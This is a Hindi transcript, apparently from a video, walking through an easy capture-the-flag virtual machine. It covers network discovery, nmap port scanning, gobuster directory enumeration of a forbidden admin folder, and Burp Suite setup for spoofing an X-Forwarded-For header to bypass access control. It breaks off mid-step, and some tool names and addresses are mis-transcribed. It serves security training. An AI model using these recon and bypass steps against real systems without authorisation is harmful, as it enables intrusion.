अस्सलाम वालेकुम। मेरा नाम महमूद अली अंसारी है और आज हम एक सीटीएफ खेलने वाले हैं, उसको प्रॉपर रिकॉर्ड करेंगे। ऑफलाइन सीटीएफ है जो onehub.com पे अवेलेबल है और सीटीएफ का नाम है यूसुफ। सबसे पहले हम उस सीटीएफ को डाउनलोड कैसे करना है, उसे ओपन कैसे करना है, हम उन चीज़ों को देखेंगे और उसके बाद फिर हम प्रॉपरली उसे सीटीएफ को प्ले कैसे करना है, उसकी जो रूट एक्सेस है, उसके जो फ्लैग हैं वो कैसे गेट करने हैं, उसके लिए कौन कौन से मेथड्स हम फॉलो करेंगे, वो आज हम इंशाल्लाह देखेंगे सीटीएफ के अंदर। बिना टाइम ज़ाया किए हम स्टार्ट करते हैं। तो चलिए, सबसे पहले तो हम अपना गूगल क्रोम ओपन करेंगे और गूगल क्रोम ओपन करने के बाद वन हब मशीन से हम उसे डाउनलोड करेंगे। लें जी, मेरा गूगल क्रोम ओपन हो गया। वन हब डॉट कॉम मशीन पे विज़िट करने के बाद सबसे पहले आपको यहाँ नज़र आएगा 10 दिसंबर 2020 को यूसुफ की तरफ से ये सीटीएफ अपलोड किया गया है। इसे ओपन करते हैं, इसके मुतालिक थोड़ी सी स्टडी करते हैं। सबसे पहले तो ये सीटीएफ क्या है, क्या हमें बता रहा है। सबसे पहले तो वो कह रहा है कि ये सीटीएफ जो है उसका नाम यूसुफ है, 10 तारीख को रिलीज़ किया गया, 10 दिसंबर 2020 को। डाउनलोड करने के लिए आप डाउनलोड कर सकते हैं। और उसके बाद डिस्क्रिप्शन में क्या कहता है, डिस्क्रिप्शन में कहता है कि आपको दो कीज बेसिकली फ्लैग हैं जो आपको गेट करने हैं और लेवल इसका इजी है, कोई इतना मुश्किल टास्क नहीं है ये। और क्या बेहतर एक्सपीरियंस जो है वो आपको विक्टर बॉक्स से आ सकता है। VMware भी आप यूज़ कर सकते हैं, बट टोटल ये 1.6 GB की फाइल है जो हम डाउनलोड कर सकते हैं। इसे डाउनलोड करने के लिए जस्ट सिंपली आपने इस बटन पे क्लिक करना है। इस पे क्लिक करने के बाद किस जगह आप इसे स्टोर करना चाह रहे हैं वो जगह सेलेक्ट करें। पास सेलेक्ट करने के बाद आप जैसे ही सेव पे क्लिक करेंगे ये डाउनलोड होना शुरू हो जाएगा। ठीक है, बाकी ये कितनी स्पीड में डाउनलोड होता है ये आपके इंटरनेट स्पीड पे डिपेंड करेगा। ठीक है, तो मैंने ऑलरेडी इसे डाउनलोड कर लिया है, इसलिए मैं इसे डाउनलोड नहीं करूँगा, मैं डाउनलोडिंग कैंसिल कर दूंगा इसकी। ठीक है, ये डाउनलोड मैं डाउनलोडिंग कैंसिल कर रहा हूँ इसकी, क्योंकि मैंने इसे ऑलरेडी डाउनलोड किया हुआ है। मैं जहाँ डाउनलोड किया है उस जगह पाथ पे जाता हूँ। वो पाथ मेरे पास यहाँ पे मौजूद है, ये यूसुफ के नाम से, ये देखिए मैंने डाउनलोड किया हुआ है। अगर आप इसे यहाँ से डबल क्लिक करके ओपन करेंगे तो बाय डिफ़ॉल्ट ये आपके पास जो भी डिफ़ॉल्ट सेट होगा तो ये उसमें ओपन हो जाएगा। यानी कि VMware सेट है तो VMware में ओपन हो जाएगा। अगर विक्टर बॉक्स है आपके पास मौजूद है तो ये विक्टर बॉक्स में ओपन हो जाएगा। तो अदरवाइज जैसा कि उन्होंने कहा, मैं यहाँ पे ओरेकल विक्टर बॉक्स जो है ओपन कर लेता हूँ। ओपन करने के बाद सबसे पहले मैं यहाँ पे इंपोर्ट के बटन पे क्लिक करता हूँ और यहाँ से फाइल को इंपोर्ट करवा देता हूँ। फाइल को इंपोर्ट करवाने के लिए मैं इस यहाँ पे इंपोर्ट के बटन पे क्लिक करने के बाद उसके फाइल के पाथ पे चला जाऊँगा। ठीक है, सोर्स इसका नॉर्मल, नेक्स्ट इसे सेव कहाँ करना है वो पाथ बताना है। वो पाथ बेसिक मशीन का जो है वो हम अपना यहाँ सेट कर लेते हैं अपनी मर्जी का, जो भी मुझे चाहिए। ठीक है, मैं यहाँ से सेट करने के बाद इंपोर्ट पे क्लिक करूँगा, वो इंपोर्ट होने लग जाएगा। ठीक है, एक तो तरीकाकार है हमारे पास ये। दूसरा तरीकाकार है कि आप ऐसे फाइल को ओपन करें, यहीं पे ही राइट क्लिक करके फाइल को ओपन विद VM बॉक्स पे क्लिक कर लें, जो बॉक्स मैनेजर पे क्लिक कर दें, तब भी वो आपके पास यहाँ पे आ जाएगी फाइल कि आपने कहाँ पे स्टोर करना है। ठीक है, सेम वही स्टेप्स आ गए, उसी जगह पे आ गया। यहाँ से मैं उसकी बेसिक सेटिंग कर लेता हूँ, अदर पे क्लिक कर रहा हूँ। अदर पे क्लिक करने के बाद मेरे पास यहाँ पे VM की ड्राइव के उसके अंदर CTF के ड्राइव के अंदर मैं यहाँ एक फोल्डर क्रिएट कर लेता हूँ यूसुफ के लिए। यूसुफ के नाम से मैंने फोल्डर क्रिएट कर लिया और सिलेक्ट फोल्डर। देन उसके बाद मैक एड्रेस पॉलिसी जो है वो मैं यहाँ पे क्लिक करके सेट कर सकता हूँ अगर मैं करना चाहूँ तो। अगर नहीं करना चाहता तो वो मेरे अकॉर्डिंगली मैं अपने अकॉर्डिंग बाद में भी इसकी सेटिंग कर सकता हूँ। मैंने इंपोर्ट पे क्लिक कर दिया, मशीन इंपोर्ट होने लग जाएगी अभी। ये देखिए मशीन इंपोर्ट हो रही है, 1 मिनट 48 सेकंड का टाइम बता रही है, लेकिन वो उससे पहले भी हो जाएगी इंपोर्ट। ठीक है, ये आपके सिस्टम की स्पीड पे डिपेंड करेगा कि आपके सिस्टम की स्पीड कितनी है। ठीक है, और इसके बाद हम इसे प्रॉपरली स्टेप्स फॉलो करेंगे, बेसिक स्कैनिंग करेंगे, उसके बाद हम इसे प्रॉपरली कंप्लीटली CTF को प्ले करेंगे जिस तरह से एक CTF खेला जाता है। और बेसिकली CTF होता क्या है, फिर CTF बेसिकली एक आपके पास चैलेंज होता है कैप्चर द फ्लैग के नेम से।
आपको टास्क कंप्लीट करना होता है और अपना फ्लैग हासिल करना होता है। ये बेसिकली आप करते हैं। सो मैं यहाँ पे आ गया, ब्रिज मोड, ओके, बाय डिफ़ॉल्ट ब्रिज में ही है वो। सो मैं यहाँ से स्टार्ट कर रहा हूँ, ये मशीन स्टार्ट हो जाए, देन उसके बाद मैं साथ ही अपनी VMware मशीन ओपन कर लेता हूँ, जिसमें बेसिकली मेरे पास काली लिनक्स मशीन इंस्टॉल है और मैं काली लिनक्स मशीन से इस CTF को हैक करूँगा, बेसिकली इस टास्क को परफॉर्म करूँगा। तो काली लिनक्स भी मैं चला लेता हूँ। मशीन रनिंग में आ गई, शो पे क्लिक करते हैं, क्या मशीन कर्सर्स मुझे नज़र आ रहे हैं यहाँ पे। मशीन के रिजल्ट्स यहाँ पे मुझे नज़र आ रहे हैं। ओके, ये देखें, यूसुफ नामी बंदा यूज़र है और पासवर्ड उसका मुझे नहीं पता। सब मुझे इसे हैक करना है, ठीक है। तो फ्लैग हैं इसके, सबसे पहले मुझे ये चीज़ें वेरीफाई करनी है। इस मशीन का IP एड्रेस क्या है, मुझे सबसे पहले तो ये चीज़ जाननी है। और इस मशीन के IP एड्रेस के बाद फिर मुझे ये चीज़ जाननी है कि इस IP एड्रेस की, इस मशीन की कौन कौन सी पोर्ट एक्टिव है, ताकि मैं पोर्ट के ऊपर हैकिंग कर सकूँ, अपना टास्क परफॉर्म कर सकूँ CTF को कंप्लीट करने के लिए, ठीक है। देखिए मेरे पास यहाँ पे मशीन ओपन हो गई। मैं यहाँ पे अपने वाइट डेवल यूज़र से लॉगिन करता हूँ, उसके बाद उसका पासवर्ड डायल करता हूँ और इस मशीन को एक्सेस कर लेता हूँ। इस मशीन को एक्सेस करने के बाद मेरे पास इसका डैशबोर्ड डेस्कटॉप ओपन हो जाएगा और देन उसके बाद मैं नेक्स्ट टास्क असाइन करूँगा। ये मेरे पास VMware इंस्टॉल है, ठीक है। मैं सबसे पहले तो अपना टर्मिनल ओपन किया। टर्मिनल ओपन करने के बाद आपको आपकी मशीन का IP अगर नहीं पता, अगर आप जानना चाहते हैं तो, ठीक है, अगर आप IP जानना चाहते हैं तो आप यहाँ पे लिखें इफ कॉन्फिग और इंटर प्रेस कर दें, आपको पता चल जाएगा कि मेरी मशीन का IP जो है वो 192.168.1.15 है, ठीक है। देन मैं अब सबसे पहले तो नेटवर्क डिस्कवर करना चाह रहा हूँ, क्योंकि बेसिकली मेरा टारगेट है पहले नंबर पे तो मुझे ये पता हो कि मेरे पूरे नेटवर्क में कितनी मशीन लाइव है और जो मेरा टारगेट है वो मशीन का IP एड्रेस, ठीक है। मशीन का IP एड्रेस जानने के लिए मैं सबसे पहले यहाँ पे sudo network net सॉरी sudo net discover sudo net discover की कमांड पे इंटर करूंगा। यहाँ मेरा रूट यूजर का पासवर्ड पुट करूंगा। देन ये ऑटोमेटिकली यहाँ पे डिस्कवरिंग करना स्टार्ट कर देगा, नेटवर्क को डिस्कवर करना। सो यहाँ पे भी नेटवर्क को जिसने डिस्कवर करना स्टार्ट कर दिया, सबसे पहले इसने ये मेरा डिफॉल्ट गेटवे को गेट किया, एक मेरी इंटर की डिवाइस है कनेक्टेड है उसको गेट किया, और एक मेरे पास ये IP कनेक्टेड है जो उसका मैक एड्रेस ये है, और आगे PCS सिस्टम बेसिकली है, और मेरा जो टारगेट है वो ये PCS सिस्टम ही है। तो मैं यहीं पे कंट्रोल कैंसिल कर दूंगा, ताकि मैं आगे कम्प्लीटली स्कैन ना करूँ। बट अगर आप कैंसिल नहीं करेंगे तो वो कम्प्लीटली स्कैन करेगा कि नंबर ऑफ जितने भी यूजर्स आपके पास यहाँ पे मौजूद होंगे उन तमाम की डिटेल यहाँ पे आपको दिखाई जाएगी, ठीक है। तो यहाँ पे अब सबसे पहले मैं पास IP आ गया, ये मेरे पास IP एड्रेस है। सो सबसे पहले तो मैं अपने यहाँ पे इसका राइट क्लिक करके डिवाइस नेम चेंज कर लेता हूँ। यहाँ पे अब मेरे पास न्यू टैब मैंने ओपन की। न्यू टैब ओपन करने के लिए कंट्रोल शिफ्ट और T कमांड है आपके पास, आप न्यू टैब ओपन कर सकते हैं टर्मिनल के अंदर ही। तो मैंने इस टर्मिनल के अंदर न्यू टैब ओपन कर ली। ओपन करने के बाद अब मैंने बेसिकली nmap के बाद -p पोर्ट स्कैनिंग करूंगा। अब nmap सॉफ्टवेयर के आगे मैंने -p लिख के हाइफन लगा दूंगा, इट मीन तमाम ओपन पोर्ट्स को स्कैन करें। बट मैं अगर रेंज देना चाहता हूँ तो मैं यहाँ पे -p 1-65,535 यानी कि जितनी भी नंबर ऑफ पोर्ट्स हैं तमाम को स्कैन करें, तो उसका ये कमांड डायल करनी है मैंने, versions और IP एड्रेस 192.168.1.17 कंफर्म कर लें। IP एड्रेस यही है 192.168.1.17। तो मैंने सेम वही IP एड्रेस पुट किया, पुट करने के बाद इंटर प्रेस करूंगा। तो ये मैं यहाँ पे डिस्कवरी करता जा रहा है पोर्ट्स को तमाम को। तो उसे डिस्कवर करने के बाद तमाम पोर्ट्स में से दो पोर्ट्स ओपन नजर आई, ये दो पोर्ट्स, ठीक है, जिस पोर्ट का है 22 पोर्ट और 80 नंबर पोर्ट।
80 नंबर पोर्ट HTTP की पोर्ट है और जिस पे यानी कि अपाचे सर्वर वेबसाइट्स वगैरह चल रही है, और 22 पोर्ट बेसिकली हमारे पास SSH की पोर्ट है। तो फर्दर उसने हमें क्या रिजल्ट दिए, इसके बाद उसने मुझे हमें रिजल्ट दिए कि 20 नंबर पोर्ट TCP की ओपन है SSH सर्विस चल रही है, और उसका वर्जन जो है ओपन SSH चल रहा है 6.6.1 उसका बेसिकली वर्जन है, और उसके नीचे उसकी डिटेल आ गई। और अब फर्दर मेरे पास यहाँ डिटेल आ रही है 80 नंबर पोर्ट की जो कि ओपन है, और ये Ubuntu यूज हो रहा है, मशीन का नेम वगैरह फर्दर आ गया। अब बेसिकली मेरे पास टारगेट है मशीन को गेट करना, ठीक है। अब यहाँ पे मैंने मशीन की फर्दर दूसरी इन्फॉर्मेशन को यूज़ करना है, जैसे कि मशीन में 80 नंबर पोर्ट पे कौन सी वेबसाइट चल रही है, उसमें कौन कौन से आईपी होस्टेड हैं, कौन सी कमांड्स चल रही हैं, कौन सी कमांड मुझे यहाँ यूटिलाइज करनी है, वो सारा कुछ मैं यहाँ पे लिखूंगा, ठीक है। सो सबसे पहले तो मेरे पास ये चीज़ आ गई। आने के बाद सबसे पहले अब मैं ओपन कर लेता हूँ ब्राउज़र। ब्राउजर एक्सेस करने के बाद ब्राउजर में यहाँ पे आईपी एड्रेस टाइप करता हूँ 192.168.1.17 एंड इंटर करते हैं, ठीक है। तो यहाँ पे मुझे बता रहा है कि अंडर कंस्ट्रक्शन सून रन। ओके, यहाँ पे मेरे पास एक वेबसाइट है जो कि डिफॉल्ट मुझे ये चीज़ बता रही है। कंट्रोल प्लस यू का बटन प्रेस करते हैं। अब इसकी व्यू सोर्स देखने के लिए तो मुझे व्यू सोर्स में कुछ नहीं मिला, ठीक है। इट मीन्स ये एक HTML की साइट है जो HTML CSS और चीज़ों में बनी है। अब इस पे कौन कौन सी डायरेक्टरीज एक्टिव हैं, तो उसके लिए हमारे पास एक सॉफ्टवेयर है जिसके थ्रू हम इस सिस्टम की डायरेक्टरीज को वेरीफाई कर सकते हैं कि सिस्टम की कितनी डायरेक्टरीज चल रही हैं, कौन कौन सी डायरेक्टरी में डाटा है, ताकि हमारे पास तमाम डाटा मौजूद हो जिसके थ्रू हम इसे स्कैन कर सकें, ठीक है। अब सबसे पहले मेरे पास यहाँ पे डेटाबेसेस में से वो फोल्डर स्कैन करने के लिए दो चीज़ें होनी लाजमी है, एक आईपी एड्रेस या URL जो मेरे पास के मौजूद है, और दूसरा वर्ड लिस्ट जो लिनक्स के अंदर बाय डिफॉल्ट होती है। तो सबसे पहले मैं यहाँ कमांड लिख रहा हूँ गो बस्टर। बस्टर के अंदर dir है डायरेक्टरी को फाइंड करने के लिए, ठीक है। हमने कहा गो बस्टर डायरेक्टरी फाइंड करने के बाद हाइफन यू से यूआरएल के बाद हाइफन डब्ल्यू करते हैं, पहले वर्ड लिस्ट दे देते हैं। मैंने कहा हाइफन डब्ल्यू वर्ड लिस्ट। अब वर्ड लिस्ट का पाथ देने के लिए मेरे पास डिफॉल्ट लिनक्स के जो भी वर्ड लिस्ट है वो याद पड़ी है, /usr /share /वर्ड लिस्ट स्लैश, यहाँ मेरे पास तमाम वर्ड लिस्ट पड़ी है। मैं जो वर्ड लिस्ट यूज करूंगा वो सिस लिस्ट के नाम से है। सिस लिस्ट के अंदर जाके डिस्कवरी के अंदर जाने के बाद मेरे पास वेब डायरेक्टरीज के नाम से, वो कंटेंट के नाम से फाइल है, वो डायरेक्टरी है बेसिकली वेब कंटेंट। उसके अंदर मेरे पास वर्ड लिस्ट एक मौजूद है जो कि मैं यहाँ पे यूटिलाइज करने वाला हूँ। आ रही लार्ज वर्ड .txt। देन उसके बाद मेरे पास यहाँ पे फर्दर कमांड है यूआरएल असाइन करने के लिए, और http://192.168.1.17 मैंने आईपी एड्रेस पुट कर दिया। यू कि मेरा यूआरएल है। देन सेकंड नंबर पे मैं यहाँ पे एचटीटीपी स्टेटसेस को चेक करना चाह रहा हूँ कि एचटीटीपी स्टेटसेस कौन कौन से हैं। वो चेक करना इसलिए चाह रहा हूँ कि मेरे पास फॉर एग्जांपल की जितनी भी डायरेक्टरीज हैं तमाम के तमाम सर्च करके दिखाए जिसके डायरेक्टरी स्टेटस 200 है या फिर उससे ज़्यादा है, ठीक है। HTTP स्टेटस चेक करने के लिए मैंने ये वर्ड यूज़ किया। मैंने कहा 200 जिसका स्टेटस है वो मतलब डायरेक्टरी स्कैन करो। देन 204 जिसका स्टेटस है वो डायरेक्टरी स्कैन करो। देन 301 जिसका स्टेटस है उसकी डायरेक्टरी भी स्कैन कर लें। देन 302 एंड 302 के बाद 307 एंड 401, ये मैंने कुछ स्टेटस पुट किए। पुट करने के बाद इंटर प्रेस करता हूँ, ठीक है। अब जब तक ये स्टेटस करता है कंप्लीट स्कैनिंग, मैं तब तक आपको बेसिक इसका बता देता हूँ कि बेसिक इसका मतलब क्या है। हमने कहा कि सिर्फ डायरेक्टरी स्कैन करो। गो बस्टर एक सॉफ्टवेयर हमने यूज किया, हमने कहा इस सॉफ्टवेयर को डायरेक्टरी स्कैन करो। सबसे पहले डायरेक्टरी स्कैन करने के लिए वर्ड लिस्ट हमें देनी पड़ती है कि इस वर्ड लिस्ट में से कोई डायरेक्टरीज अगर मैच होती हैं तो उन्हें शो कर दो। अब हमने उसे वर्ड लिस्ट को मैच करने के लिए हमने उसे वर्ड लिस्ट को साइन कर दी, जो कि यूजर के अंदर जाके शेयर की फोल्डर के अंदर जाके हमारे पास मौजूद है ये वाली वर्ड लिस्ट। ये वर्ड लिस्ट का पाथ देने के बाद मैंने कहा कि हाइफन यू
यूआरएल है मेरे पास ये वाला जिसमें से हमें चेक करना है, और स्टेटस मतलब कि जो हमारे पास HTTP हाइपर टेक्स्ट ट्रांसफर प्रोटोकॉल है उसके स्टेटस जो है वो अगर 200 हो यानी कि वो एक्सेस हो रहा हो डायरेक्टली, वो भी असाइन कर दो, शो करवा दो। जिसका 204 है वो भी शो करवा दो, 301 है वो भी शो करवा दो, 307 है वो भी शो करवा दो, और 401 है वो भी शो करवा दो। देन उसके बाद उसने हमें पास यहाँ पे सॉफ्टवेयर स्टार्ट हो गया। स्टार्ट होने के बाद उसने टारगेट वगैरह और डिटेल वगैरह हमें यहाँ बताना शुरू कर दिया, और देन उसके बाद उसने यहाँ पे कहा कि एक पहला स्लैश डायरेक्टरी है जिसका स्टेटस 200 है, यानी कि जैसे कि हम देख चुके हैं वो एक्सेस हो रही है, जिसमें ये वाली फाइल यानी कि डिफॉल्ट इस पे जा रहा है, वो इस फाइल की बात कर रहा है, ये एक्सेस हो रही है, इसका स्टेटस 200 है। देन उसके बाद उसने एक और फाइल हमें कही जिसका नाम है एडमिनिस्ट्रेशन, जिसका स्टेटस है 301। अब एडमिनिस्ट्रेशन जिसका स्टेटस 301 है, ओके, देन एक ही फोल्डर है हमारे पास एडमिनिस्ट्रेशन और उसका स्टेटस 301 है। और 301 स्टेटस का मतलब है कि वो बेसिकली फाइल फोल्डर जो है आपका वो रीडायरेक्ट हो रहा है, इट मीन्स कि वो कहीं और मुझे लेके जा रहा है। अब मुझे ये चीज वेरीफाई करनी है कि वो मुझे कहाँ लेके जा रहा है। देन उससे पहले मुझे एक चीज ये फाइल वेरीफाई करनी है कि वो जो स्टेटस है, मतलब कि उसका स्टेटस 301 है, तो वो मुझे रिजेक्ट कर रहा है, तो मुझे सबसे पहले फिर ये वेरीफाई करना है कि इसके अंदर एडमिनिस्ट्रेशन के अंदर कौन कौन से फोल्डर कौन कौन से डायरेक्टरीज हैं। ठीक है, तो सबसे पहले तो मैं इसे जल्दी एक्सेस करके दिखा देता हूँ आपको एक बार। ठीक है, IP/administration पेस्ट, ये देखें जी, फॉरबिडन एरर आ गया कि आपके पास परमिशन नहीं है इस फोल्डर को एक्सेस करने की। तो अब मेरे पास जब परमिशन नहीं है इसको एक्सेस करने की, तो फिर भी हम वर्ड लिस्ट के थ्रू अपनी कमांड चला के वो वेरीफाई कर सकते हैं कि इसमें नंबर ऑफ डायरेक्टरीज कितनी है। तो मैं दोबारा से गो बस्टर की कमांड यूज करूंगा, गो बस्टर dir-u, यू के बाद यूआरएल पेस्ट कर देंगे। यूआरएल पेस्ट करने के बाद ठीक है, अच्छा यहाँ पे हमने यूआरएल अब पेस्ट करें या बाद में पेस्ट करें इसका मसला नहीं है, फर्क नहीं पड़ता कि आपने पहले यूआरएल पेस्ट कर दिया या पहले वर्ड लिस्ट पेस्ट कर दी, कोई फर्क नहीं पड़ता। जैसे कि मैंने पहले वर्ड लिस्ट पेस्ट की, देन मैंने यूआरएल पेस्ट किया, तो आपका रिजल्ट सेम थे। अब मैं पहले वर्ड लिस्ट दे रहा हूँ, सॉरी पहले यूआरएल दे रहा हूँ, अब वर्ड लिस्ट दूंगा, तो अब नोट करेंगे वर्ड रिजल्ट हमारे पास फिर भी सेम ही आएंगे। शेयर के अंदर वर्ड लिस्ट के अंदर डिस्कवरी है, देन यहाँ पे मेरे पास है पड़ा डायरेक्टरीज, डायरेक्टरीज है, मैं एक सेकंड चलिए इधर से वेरीफाई कर लेता हूँ। मेरे पास यहाँ पे वेब कंटेंट है, वेब कंटेंट के अंदर यहाँ मेरे पास काफ़ी सारी फाइल्स हैं जिन्हें मैं यूटिलाइज कर सकता हूँ। लार्ज वर्ड्स डॉट txt की फाइल को मैंने रन किया, रन करने के बाद -s सेम 200 मतलब वो सेम स्टेटस मैं दोबारा से पुट कर दूंगा जो मेरे पास ऑलरेडी स्टेटस वहाँ पे शो हो रहे थे। जैसे कि मैंने पहले स्टेटस दिए थे, 200 दिया था, 204 दिया था, देन मैंने 301 दिया था, 302 था, और 307 एंड 401 इंटर। ये एक बार फिर से वर्ड लिस्ट को स्कैन करना शुरू कर देगा। अब मुझे फर्दर पहले तो एक चीज पता चल गई कि जो डायरेक्टली एक्सेस नहीं हो रही उसमें एक रिडायरेक्शन पे लगा हुआ फोल्डर है जिसका नाम एडमिनिस्ट्रेशन है, और अब एडमिनिस्ट्रेशन के अंदर कितने नंबर ऑफ फोल्डर्स है वो वेरीफाई करने के लिए मैं यहाँ पे आ गया। तो अब उसे वेरीफाई करने के लिए मेरे पास यहाँ पे लिस्टें मौजूद हैं जो मैंने यूजर को यूज कर रहा हूँ। बाकी इसके अलावा आप दूसरी वर्ड लिस्ट भी यूज कर सकते हैं, ये लाजमी नहीं है कि जो वर्ड लिस्ट मैंने यूज की आप भी यही यूज करें, बट आप ये भी यूज कर सकते हैं, इसके अलावा दूसरी भी यूज कर सकते हैं वर्ड लिस्ट। अब देखते हैं कि ये मुझे रिजल्ट्स कितने देता है। अगर रिजल्ट्स नहीं दे रहा तो फिर मैं दूसरी वर्ड लिस्ट यूज करूंगा जो मुझे अच्छे रिजल्ट दे सकते। एडमिनिस्ट्रेशन एक बार फिर से फोल्डर उसने फाइंड कर लिया, लेकिन अच्छा यहाँ पे मैं कंट्रोल सी हमसे एक मिस्टेक हो गई क्योंकि हमने यहाँ पे वर्ड लिस्ट देनी थी। बेसिकली हमने यहाँ पे देना था कि यूआरएल हमने गलत दे दिया, ओके, इसलिए हमने उसमें कोई डायरेक्टरीज फाइंड नहीं करके दी।
192.168.1.17 उसके अंदर जो मेरे पास ये फोल्डर है एडमिनिस्ट्रेशन का, इसको टारगेट करना है। ठीक है, इसके अंदर हमने फोल्डर्स ढूंढने एडमिनिस्ट्रेशन। अब देखिए इसके अंदर हम बेसिकली वर्ड्स लिस्ट निकाल रहे हैं, तो मेरे पास इसके अंदर फर्दर फोल्डर्स उसने ओपन करके दिखा दिए। इसमें इंक्लूड्स का एक फोल्डर है, लॉग आउट का एक फोल्डर है, अपलोड्स का एक फोल्डर है, यूजर्स का एक फोल्डर है। ठीक है, ये उसने बेसिकली मुझे यहाँ पे फर्दर फोल्डर्स डायरेक्टरीज फाइंड करके दे दी। ठीक है, तो अब मेरे पास देन रिक्वेस्ट गेट करने के लिए एक मेथड्स हैं जिन्हें मैं रिक्वेस्ट गेट करूंगा, और इसमें से प्रोसीजर में फर्दर काम करूंगा, क्योंकि बेसिकली जब आपके पास 301 स्टेटस होता है तो जस्ट उसका हेडर कॉल हो रहा होता है, और हेडर ही वेरीफाई कर लेता है कि यहाँ पे 301 स्टेटस है, तो वो वहां से कहीं और मूव कर जाता है जहाँ पे उस स्टेटस का पाथ दिया होता है। तो अब जबकि हमें पता चल चुका है कि डायरेक्टरीज जो हैं वो नंबर ऑफ डायरेक्टरीज कितनी है वो मुझे पता चल गई, और फर्दर उसके पास जो डाटा था वो मुझे पता चल चुका है। अब मैं सबसे पहले यहाँ पे बर्ड सूट स्टार्ट कर दूंगा, जो कि मेरे पास यहाँ पे मौजूद है। बर्ड सूट एक सॉफ्टवेयर है जो आपके पास एज ए प्रॉक्सी काम करता है, जो वेबसाइट के जितनी भी ट्रैफिक है उनको सबको यूज करता है और आपके पास यहाँ पे रिजल्ट देता है। और बर्ड सूट को यूज करने के लिए हमारे पास एक सॉफ्टवेयर मौजूद है और बेसिकली एक्सटेंशन मौजूद है जिसे हम ब्राउजर के अंदर ऐड ऑन करते हैं। उस एक्सटेंशन का नाम है प्रॉक्सी। प्रॉक्सी इस तरह से एक्सटेंशन है हमारे पास। ठीक है, या आप गूगल पे जाके इसलिए सर्च कर सकते हैं बर्ड सूट। बर्ड सूट, ओके, बर्ड सूट प्रॉक्सी। प्रॉक्सी ये भी आप सर्च कर सकते हैं इस तरह से। अदरवाइज आप यहाँ एड ऑन में आके यहाँ पे एक्सटेंशन में सर्च भी कर सकते हैं। ठीक है, ये यहाँ पे मेरे पास प्रॉक्सी नज़र आ रही है स्टैंडर्ड। उसका प्रॉक्सी का नाम है, बेसिकली ये एक एक्सटेंशन है जो आपके सिस्टम के साथ कनेक्ट होने की सहूलियत अदा करती है, तो आप इसे यूटिलाइज कर सकते हैं। ठीक है, जैसे ही इसे आप ऐड टू क्रोम या ऐड टू फायरफॉक्स करेंगे तो आप नोट करेंगे यहाँ पे आपको इस तरह से ये ओपन हो जाएगी। ठीक है, तो अभी देखिए मेरे पास ये ओपन हो गई यहाँ पे। अब प्रॉक्सी मेरे पास यहाँ इंस्टॉल है, लेकिन अभी फोल्डर्स के अंदर मेरे पास कोई उसकी सेटिंग्स अवेलेबल नहीं है, तो मैं आप लोगों के सामने ही यहीं पे आप लोगों को दिखाता हूँ कि हम उसकी बेसिकली सेटिंग करते कैसे हैं। बर्थसूट को ओपन करने के बाद टेम्परेरी डिफॉल्ट और स्टार्ट पे क्लिक करते हैं हम। नेक्स्ट नेक्स्ट स्टार्ट प्रोजेक्ट प्लीज वेट। ओके, स्टार्ट होने के बाद सबसे पहले आपने मूव हो जाना है प्रॉक्सी के अंदर। प्रॉक्सी के अंदर आने के बाद ये थर्ड नंबर आपको नजर आएगा डैशबोर्ड, टारगेट और प्रॉक्सी। प्रॉक्सी के अंदर आने के बाद ऑप्शंस। ऑप्शंस में आने के बाद यहाँ पे एक प्रॉक्सी ऑलरेडी कॉन्फ़िगर्ड है 192.127.0.0.1 कॉलन 8080। यहाँ पे हमारे पास एक प्रॉक्सी इंस्टॉल्ड है, तो अब सेम इसी प्रॉक्सी को हमने कॉन्फ़िगर करना है इस सॉफ्टवेयर पे जो है प्रॉक्सी। प्रॉक्सी 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 को इंस्टॉल करने के लिए आप जब क्लिक करते हैं इंस्टॉल हो जाता है, जैसे कि अभी आपने देखा। देन उसके बाद आप क्लिक करके ऑप्शन में जाते हैं। ऑप्शन में मूव करते हैं, आपके पास इस तरह से एक लेआउट नजर आता है, जिस लेआउट में आने के बाद आप जस्ट ऐड के बटन पे क्लिक करते हैं प्लस के साइन पे। यहाँ टाइटल दे देते हैं, ये ऑप्शनल होता है, आप दें या ना दें। बक्सूट के नाम से मैंने टाइटल दे दिया। अब मेरे पास यहाँ पे सॉकेट जो है वो HTTP की ही है। ठीक है, टाइप प्रॉक्सी टाइप HTTP है। देन उसके बाद IP एड्रेस यहाँ मैं पुट करता हूँ अपना दिस वन, और अनेबल अनेबल, और पोर्ट में यहाँ पे 8080 दे रहा हूँ। ऑप्शनल नेम वगैरह में कोई पुट नहीं कर रहा। देन मैं इसे कर रहा हूँ सेव। सेव करने के बाद आप यहाँ देख सकते हैं आपको यहाँ पे ऑफ और बर्ड सूट के नाम से प्रॉक्सी नजर आ जाएगी। तो
अब यहाँ पे सबसे पहले तो मुझे बर्ड सूट मतलब प्रॉक्सी एक्टिव करनी है। यहाँ पे प्रॉक्सी पे क्लिक करके आपने बर्ड सूट पे क्लिक करना है। बर्ड सूट पे क्लिक करने के बाद यहाँ आप देखेंगे बर्ड लिखा हुआ नजर आ जाएगा। देन आपने इसे रिफ्रेश करना है यूआरएल को। यूआरएल पेज को जैसे ही आप रिफ्रेश करेंगे तो आप यहाँ पे आके देखेंगे प्रॉक्सी के अंदर इंटरसेप्ट और देख लेते हैं। देख थोड़ा लेट रिजल्ट आया है मेरे पास, लेकिन रिजल्ट आ गया है। और ये भी आप देखेंगे ये लोड होता रहेगा, क्योंकि जब आप प्रॉक्सी यहाँ बॉक्स ओपन करेंगे तो आपका जैसे ही रिजल्ट यहाँ पे शो होंगे या आपके पास इस जगह पे से लोड होता रहेगा जब तक आप इधर से फॉरवर्ड नहीं करेंगे। तो रिजल्ट फॉरवर्ड करने से पहले मैं यहाँ पे इन तमाम रिजल्ट्स को राइट क्लिक करके सेंड रिपीटर में ले जाऊंगा। रिपीटर में यहाँ मूव करने के बाद यहाँ पे मैं इसके रिजल्ट्स को फाइंड कर सकता हूँ कि बेसिकली रिपीटर में हम इसलिए लेके जाते हैं कि हमारे पास जो रिजल्ट्स हैं वो ब्राउजर के बगैर ही हम यहीं पे देख सकें। तो इसे ब्राउजर में लेके आने के बाद मेरे पास रिपीटर में लेके आने के बाद यहाँ पे आपको पास बता रहा है कि गेट के मेथड के थ्रू उसने एडमिनिस्ट्रेशन कोड गेट किया। देन उसके बाद http/101 को उसने एक्सेस किया और इस होस्ट मशीन के थ्रू एक्सेस किया है। और होस्ट मशीन के बाद में एंटर करके यहाँ पे हम बेसिकली हेडर को मैनिपुलेट कर सकते हैं। तो हेडर मैनिपुलेट करने के लिए मैं इस कमांड को यूज कर रहा हूँ और x डैश फॉरवर्डेड worded dash for कॉलन और लोकल 